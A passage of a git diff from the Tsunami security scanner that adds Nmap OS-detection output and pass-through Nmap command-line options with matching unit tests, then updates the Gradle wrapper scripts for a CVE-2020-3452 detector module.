getHostFromNmapRun(nmapRun) - .map(this::buildNetworkEndpointFromHost) - .orElse(scanTarget.getNetworkEndpoint())) + var nmapHost = getHostFromNmapRun(nmapRun); + var infoBuilder = + TargetInfo.newBuilder() + .addNetworkEndpoints( + nmapHost + .map(this::buildNetworkEndpointFromHost) + .orElse(scanTarget.getNetworkEndpoint())); + var oses = buildOperatingSystemClassesFromHost(nmapHost); + if (!oses.isEmpty()) { + infoBuilder.addAllOperatingSystemClasses(oses); + } + return infoBuilder.build(); + } + + private static OperatingSystemClass convertOperatingSystemClassFromXml(OsClass osc) { + int accuracy = 0; + try { + accuracy = Integer.parseInt(osc.accuracy()); + } catch (NumberFormatException e) { + logger.atWarning().withCause(e).log("Invalid accuracy value: %s", osc.accuracy()); + } + return OperatingSystemClass.newBuilder() + .setType(osc.type()) + .setVendor(osc.vendor()) + .setOsFamily(osc.osFamily()) + .setOsGeneration(osc.osGen()) + .setAccuracy(accuracy) .build(); } + private ImmutableList buildOperatingSystemClassesFromHost( + Optional host) { + if (host.isEmpty()) { + return ImmutableList.of(); + } + return host.get().oses().stream() + .flatMap(os -> os.osMatches().stream()) + .flatMap(osm -> osm.osClasses().stream()) + // Note: we do not order the OSes by accuracy, because Nmap populates the list starting with + // the "perfect" matches: https://github.com/nmap/nmap/blob/master/output.cc#L1896 + .limit(MAX_NUMBER_OF_OS_GUESSES) + .map(NmapPortScanner::convertOperatingSystemClassFromXml) + .collect(toImmutableList()); + } + private NetworkEndpoint buildNetworkEndpointFromHost(Host host) { Optional
address = getAddressFromHost(host); Optional hostname = getHostnameFromHost(host); diff --git a/google/portscan/nmap/src/main/java/com/google/tsunami/plugins/portscan/nmap/client/NmapClient.java b/google/portscan/nmap/src/main/java/com/google/tsunami/plugins/portscan/nmap/client/NmapClient.java index 6c006ab5f..1fc9dd2d5 100644 --- a/google/portscan/nmap/src/main/java/com/google/tsunami/plugins/portscan/nmap/client/NmapClient.java +++ b/google/portscan/nmap/src/main/java/com/google/tsunami/plugins/portscan/nmap/client/NmapClient.java @@ -21,6 +21,7 @@ import com.google.common.annotations.VisibleForTesting; import com.google.common.collect.ImmutableList; +import com.google.errorprone.annotations.CanIgnoreReturnValue; import com.google.tsunami.common.command.CommandExecutor; import com.google.tsunami.common.command.CommandExecutorFactory; import com.google.tsunami.common.data.NetworkEndpointUtils; @@ -191,6 +192,7 @@ Optional getFlag() { } private final String nmapBinaryPath; + private final List extraCommandArgs = new ArrayList<>(); private final List networkEndpoints = new ArrayList<>(); private final List hostDiscoveryTechniques = new ArrayList<>(); private final List dnsServers = new ArrayList<>(); @@ -321,6 +323,10 @@ ArrayList buildRunCommandArgs() { runCommandArgs.add("-6"); } + if (extraCommandArgs != null) { + runCommandArgs.addAll(extraCommandArgs); + } + networkEndpoints.stream() .map(NmapClient::networkEndpointToCliRepresentation) .forEach(runCommandArgs::add); @@ -354,6 +360,20 @@ public NmapClient withTargetNetworkEndpoint(NetworkEndpoint networkEndpoint) { return this; } + /** + * Sets additional command line options for the Nmap scanning. They are appended at the end of + * nmap command invocation, right before the targets. + * + * @param commandArgs The extra command line options. + */ + @CanIgnoreReturnValue + public NmapClient withExtraCommandLineOptions(List commandArgs) { + if (commandArgs != null) { + this.extraCommandArgs.addAll(commandArgs); + } + return this; + } + /** * Skips the host discovery stage, this causes nmap to perform scanning even if the host is dead. * This method is incompatible with {@link diff --git a/google/portscan/nmap/src/main/java/com/google/tsunami/plugins/portscan/nmap/option/NmapPortScannerCliOptions.java b/google/portscan/nmap/src/main/java/com/google/tsunami/plugins/portscan/nmap/option/NmapPortScannerCliOptions.java index ba90e7682..d52f893d3 100644 --- a/google/portscan/nmap/src/main/java/com/google/tsunami/plugins/portscan/nmap/option/NmapPortScannerCliOptions.java +++ b/google/portscan/nmap/src/main/java/com/google/tsunami/plugins/portscan/nmap/option/NmapPortScannerCliOptions.java @@ -38,6 +38,14 @@ public final class NmapPortScannerCliOptions implements CliOption { // Splitting and conversion is done by the NmapPortScanner itself. public String portRangesTarget; + @Parameter( + names = "--nmap-cmd-opts", + description = "Additional command line options for Nmap scanning.") + public List nmapCmdOpts; + + @Parameter(names = "--nmap-os-detection", description = "Activates OS detection in Nmap.") + public boolean nmapOsDetection; + @Override public void validate() {} } diff --git a/google/portscan/nmap/src/test/java/com/google/tsunami/plugins/portscan/nmap/NmapPortScannerTest.java b/google/portscan/nmap/src/test/java/com/google/tsunami/plugins/portscan/nmap/NmapPortScannerTest.java index 8b09de44c..48cb39743 100644 --- a/google/portscan/nmap/src/test/java/com/google/tsunami/plugins/portscan/nmap/NmapPortScannerTest.java +++ b/google/portscan/nmap/src/test/java/com/google/tsunami/plugins/portscan/nmap/NmapPortScannerTest.java @@ -35,6 +35,7 @@ import com.google.tsunami.plugins.portscan.nmap.option.NmapPortScannerCliOptions; import com.google.tsunami.proto.NetworkEndpoint; import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.OperatingSystemClass; import com.google.tsunami.proto.PortScanningReport; import com.google.tsunami.proto.ScanTarget; import com.google.tsunami.proto.Software; @@ -99,7 +100,16 @@ public void run_whenNmapRunHasOpenPorts_returnsMatchingService() throws Exceptio portScanner.scan(ScanTarget.newBuilder().setNetworkEndpoint(networkEndpoint).build())) .isEqualTo( PortScanningReport.newBuilder() - .setTargetInfo(TargetInfo.newBuilder().addNetworkEndpoints(networkEndpoint)) + .setTargetInfo( + TargetInfo.newBuilder() + .addNetworkEndpoints(networkEndpoint) + .addOperatingSystemClasses( + OperatingSystemClass.newBuilder() + .setType("WAP") + .setVendor("Asus") + .setOsFamily("embedded") + .setAccuracy(98) + .build())) .addNetworkServices( NetworkService.newBuilder() .setNetworkEndpoint( diff --git a/google/portscan/nmap/src/test/java/com/google/tsunami/plugins/portscan/nmap/client/NmapClientTest.java b/google/portscan/nmap/src/test/java/com/google/tsunami/plugins/portscan/nmap/client/NmapClientTest.java index 1dd273884..1dda2936d 100644 --- a/google/portscan/nmap/src/test/java/com/google/tsunami/plugins/portscan/nmap/client/NmapClientTest.java +++ b/google/portscan/nmap/src/test/java/com/google/tsunami/plugins/portscan/nmap/client/NmapClientTest.java @@ -22,6 +22,7 @@ import static org.mockito.Mockito.mock; import static org.mockito.Mockito.when; +import com.google.common.collect.ImmutableList; import com.google.tsunami.common.command.CommandExecutor; import com.google.tsunami.common.command.CommandExecutorFactory; import com.google.tsunami.common.data.NetworkEndpointUtils; @@ -353,6 +354,32 @@ public void buildRunCommandArgs_withMultipleScript_returnsCorrectCommandLine() { report.getAbsolutePath()); } + @Test + public void buildRunCommandArgs_withExtraCommandLineArgs_returnsCorrectCommandLine() { + client + .withTargetNetworkEndpoint(NetworkEndpointUtils.forIp("1.1.1.1")) + .withExtraCommandLineOptions(ImmutableList.of("--foo", "--bar")) + .withScript("test1", "a", "b") + .withScript("test2", "e", "f"); + + assertThat(client.buildRunCommandArgs()) + .containsExactly( + nmapFile.getAbsolutePath(), + "--script", + "test1", + "--script-args", + "a,b", + "--script", + "test2", + "--script-args", + "e,f", + "--foo", + "--bar", + "1.1.1.1", + "-oX", + report.getAbsolutePath()); + } + @Test public void getResults_onceClientHasRan_returnsNmapRunReport() throws IOException, ExecutionException, InterruptedException, ParserConfigurationException, diff --git a/google/portscan/nmap/src/test/java/com/google/tsunami/plugins/portscan/nmap/client/parser/NmapResultHandlerTest.java b/google/portscan/nmap/src/test/java/com/google/tsunami/plugins/portscan/nmap/client/parser/NmapResultHandlerTest.java index 561b291d0..6c219c228 100644 --- a/google/portscan/nmap/src/test/java/com/google/tsunami/plugins/portscan/nmap/client/parser/NmapResultHandlerTest.java +++ b/google/portscan/nmap/src/test/java/com/google/tsunami/plugins/portscan/nmap/client/parser/NmapResultHandlerTest.java @@ -423,4 +423,367 @@ public void parse_always_buildsNmapRunFromXmlDocument() throws IOException, SAXE .build()) .build()); } + + @Test + public void parse_multipleOsMatch_buildsNmapRunFromXmlDocument() + throws IOException, SAXException { + InputStream resource = + getClass().getResourceAsStream("testdata/scanRunIPv6_multipleOsMatch.xml"); + NmapResultHandler nmapResultHandler = new NmapResultHandler(); + + parser.parse(resource, nmapResultHandler); + + assertThat(nmapResultHandler.getNmapRun()) + .isEqualTo( + NmapRun.builder() + .setScanner("nmap") + .setArgs( + "nmap -n -sS -Pn -O --version-intensity 9 -sC -sV -6 -oX /tmp/ipv6.xml" + + " 2001:4860:4860::8888") + .setStart("1573478646") + .setStartStr("Mon Nov 11 14:24:06 2019") + .setVersion("7.70") + .setProfileName("") + .setXmlOutputVersion("1.04") + .setVerbose(Verbose.builder().setLevel("0").build()) + .setDebugging(Debugging.builder().setLevel("0").build()) + .addValueElement( + Target.builder() + .setSpecification("test specification") + .setStatus("skipped") + .setReason("invalid") + .build()) + .addValueElement( + TaskBegin.builder() + .setTask("test task") + .setTime("123456789") + .setExtraInfo("test extrainfo") + .build()) + .addValueElement( + TaskProgress.builder() + .setTask("test task") + .setTime("123456789") + .setPercent("90") + .setRemaining("10") + .setEtc("123") + .build()) + .addValueElement( + TaskEnd.builder() + .setTask("test task") + .setTime("123456789") + .setExtraInfo("test extrainfo") + .build()) + .addValueElement( + PreScript.builder() + .addScript( + Script.builder() + .setId("test prescript script1 id") + .setOutput("test prescript script1 output") + .addValueElement( + Elem.builder() + .setKey("test prescript script1 elem key") + .setValue( + "\n test prescript script1 elem value\n ") + .build()) + .addValueElement("\n \n ") + .build()) + .addScript( + Script.builder() + .setId("test prescript script2 id") + .setOutput("test prescript script2 output") + .addValueElement( + Elem.builder() + .setKey("test prescript script2 elem1 key") + .setValue( + "\n test prescript script2 elem1 value\n ") + .build()) + .addValueElement( + Elem.builder() + .setKey("test prescript script2 elem2 key") + .setValue( + "\n test prescript script2 elem2 value\n ") + .build()) + .addValueElement("\n \n \n ") + .build()) + .build()) + .addValueElement( + PostScript.builder() + .addScript( + Script.builder() + .setId("test postscript script id") + .setOutput("test postscript script output") + .addValueElement( + Table.builder() + .setKey("test postscript table key") + .addValueElement( + Elem.builder() + .setKey("test postscript table elem key") + .setValue( + "\n" + + " test postscript table elem" + + " value\n" + + " ") + .build()) + .build()) + .addValueElement( + Table.builder() + .setKey("test postscript nest outer table key") + .addValueElement( + Table.builder() + .setKey("test postscript nest inner table key") + .addValueElement( + Elem.builder() + .setKey( + "test postscript nest table elem key") + .setValue( + "\n" + + " test postscript" + + " table elem value\n" + + " ") + .build()) + .build()) + .build()) + .addValueElement("\n \n \n ") + .build()) + .build()) + .addValueElement( + Host.builder() + .setStartTime("1573478646") + .setEndTime("1573478879") + .setComment("host comment") + .addValueElement( + Status.builder() + .setState("up") + .setReason("user-set") + .setReasonTtl("0") + .build()) + .addValueElement( + Address.builder() + .setAddr("2001:4860:4860::8888") + .setAddrType("ipv6") + .setVendor("") + .build()) + .addValueElement( + Hostnames.builder() + .addHostname( + Hostname.builder().setName("hostname").setType("user").build()) + .addHostname( + Hostname.builder().setName("hostname2").setType("PTR").build()) + .build()) + .addValueElement(Smurf.builder().setResponses("responses").build()) + .addValueElement( + Ports.builder() + .addExtraPorts( + ExtraPorts.builder() + .setState("filtered") + .setCount("998") + .addExtraReasons( + ExtraReasons.builder() + .setReason("no-responses") + .setCount("996") + .build()) + .addExtraReasons( + ExtraReasons.builder() + .setReason("admin-prohibiteds") + .setCount("2") + .build()) + .build()) + .addPort( + Port.builder() + .setProtocol("tcp") + .setPortId("53") + .setState( + State.builder() + .setState("open") + .setReason("syn-ack") + .setReasonTtl("120") + .setReasonIp("") + .build()) + .setService( + Service.builder() + .setName("tcpwrapped") + .setConf("8") + .setMethod("probed") + .setVersion("") + .setProduct("") + .setExtraInfo("") + .setTunnel("") + .setProto("") + .setRpcNum("") + .setLowVer("") + .setHighVer("") + .setHostname("") + .setOsType("") + .setDeviceType("") + .setServiceFp("") + .build()) + .build()) + .addPort( + Port.builder() + .setProtocol("tcp") + .setPortId("443") + .setState( + State.builder() + .setState("open") + .setReason("syn-ack") + .setReasonTtl("120") + .setReasonIp("") + .build()) + .setService( + Service.builder() + .setName("https") + .setConf("10") + .setMethod("probed") + .setVersion("") + .setProduct("sffe") + .setExtraInfo("") + .setTunnel("ssl") + .setProto("") + .setRpcNum("") + .setLowVer("") + .setHighVer("") + .setHostname("") + .setOsType("") + .setDeviceType("") + .setServiceFp("servicefp") + .build()) + .addScript( + Script.builder() + .setId("http-title") + .setOutput("Error 400 (Bad Request)!!1") + .addValueElement( + Elem.builder() + .setKey("title") + .setValue("Error 400 (Bad Request)!!1") + .build()) + .addValueElement("\n \n ") + .build()) + .build()) + .build()) + .addValueElement( + Os.builder() + .addPortUsed( + PortUsed.builder() + .setState("open") + .setProto("tcp") + .setPortId("53") + .build()) + .addOsMatch( + OsMatch.builder() + .setName("name") + .setAccuracy("accuracy") + .setLine("line") + .addOsClass( + OsClass.builder() + .setVendor("vendor0") + .setOsGen("osgen0") + .setType("type0") + .setAccuracy("accuracy0") + .setOsFamily("osfamily0") + .addCpe(Cpe.builder().setValue("cpe0").build()) + .build()) + .addOsClass( + OsClass.builder() + .setVendor("vendor1") + .setOsGen("osgen1") + .setType("type1") + .setAccuracy("accuracy1") + .setOsFamily("osfamily1") + .addCpe(Cpe.builder().setValue("cpe1").build()) + .build()) + .build()) + .addOsMatch( + OsMatch.builder() + .setName("Linux 2.6.32") + .setAccuracy("96") + .setLine("55742") + .addOsClass( + OsClass.builder() + .setVendor("Linux") + .setOsGen("2.6.X") + .setType("general purpose") + .setAccuracy("96") + .setOsFamily("Linux") + .addCpe( + Cpe.builder() + .setValue( + "cpe:/o:linux:linux_kernel:2.6.32") + .build()) + .build()) + .build()) + .addOsFingerprint( + OsFingerprint.builder().setFingerprint("fingerprint").build()) + .build()) + .addValueElement(Distance.builder().setValue("distance value").build()) + .addValueElement(Uptime.builder().setSeconds("1").setLastBoot("2").build()) + .addValueElement( + TcpSequence.builder() + .setIndex("0") + .setDifficulty("difficulty") + .setValues("values") + .build()) + .addValueElement( + IpIdSequence.builder().setClazz("class").setValues("values").build()) + .addValueElement( + TcpTsSequence.builder().setClazz("class").setValues("values").build()) + .addValueElement( + HostScript.builder() + .addScript( + Script.builder() + .setId("hostscript script id") + .setOutput("hostscript script output") + .addValueElement( + Elem.builder() + .setKey("hostscript script elem key") + .setValue("elem value") + .build()) + .addValueElement("\n \n ") + .build()) + .build()) + .addValueElement( + Trace.builder() + .setProto("proto") + .setPort("port") + .addHop( + Hop.builder() + .setTtl("ttl") + .setRtt("rtt") + .setIpAddr("ipaddr") + .setHost("host") + .build()) + .build()) + .addValueElement( + Times.builder() + .setSrtt("1112") + .setRttVar("450") + .setTo("100000") + .build()) + .build()) + .addValueElement( + Output.builder().setType("test output type").setValue("output value").build()) + .setRunStats( + RunStats.builder() + .setFinished( + Finished.builder() + .setTime("1573478879") + .setTimeStr("Mon Nov 11 14:27:59 2019") + .setElapsed("232.81") + .setSummary( + "Nmap done at Mon Nov 11 14:27:59 2019; 1 IP address (1 host" + + " up) scanned in 232.81 seconds") + .setExit("success") + .setErrorMsg("") + .build()) + .setHosts(Hosts.builder().setUp("1").setDown("0").setTotal("1").build()) + .build()) + .addScanInfo( + ScanInfo.builder() + .setType("syn") + .setScanFlags("") + .setProtocol("tcp") + .setNumServices("1000") + .setServices("1,2,3,80,2725") + .build()) + .build()); + } } diff --git a/google/portscan/nmap/src/test/resources/com/google/tsunami/plugins/portscan/nmap/client/parser/testdata/scanRunIPv6_multipleOsMatch.xml b/google/portscan/nmap/src/test/resources/com/google/tsunami/plugins/portscan/nmap/client/parser/testdata/scanRunIPv6_multipleOsMatch.xml new file mode 100644 index 000000000..7c16c162d --- /dev/null +++ b/google/portscan/nmap/src/test/resources/com/google/tsunami/plugins/portscan/nmap/client/parser/testdata/scanRunIPv6_multipleOsMatch.xml @@ -0,0 +1,114 @@ + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + cpe0 + + + cpe1 + + + + cpe:/o:linux:linux_kernel:2.6.32 + + + + + + + + + + + + + + + + + output value + + + + + diff --git a/govtech/detectors/cves/cve_2020_3452/gradle/wrapper/gradle-wrapper.jar b/govtech/detectors/cves/cve_2020_3452/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/govtech/detectors/cves/cve_2020_3452/gradle/wrapper/gradle-wrapper.jar and b/govtech/detectors/cves/cve_2020_3452/gradle/wrapper/gradle-wrapper.jar differ diff --git a/govtech/detectors/cves/cve_2020_3452/gradle/wrapper/gradle-wrapper.properties b/govtech/detectors/cves/cve_2020_3452/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/govtech/detectors/cves/cve_2020_3452/gradle/wrapper/gradle-wrapper.properties +++ b/govtech/detectors/cves/cve_2020_3452/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/govtech/detectors/cves/cve_2020_3452/gradlew b/govtech/detectors/cves/cve_2020_3452/gradlew index fbd7c5158..1aa94a426 100755 --- a/govtech/detectors/cves/cve_2020_3452/gradlew +++ b/govtech/detectors/cves/cve_2020_3452/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/govtech/detectors/cves/cve_2020_3452/gradlew.bat b/govtech/detectors/cves/cve_2020_3452/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/govtech/detectors/cves/cve_2020_3452/gradlew.bat +++ b/govtech/detectors/cves/cve_2020_3452/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem 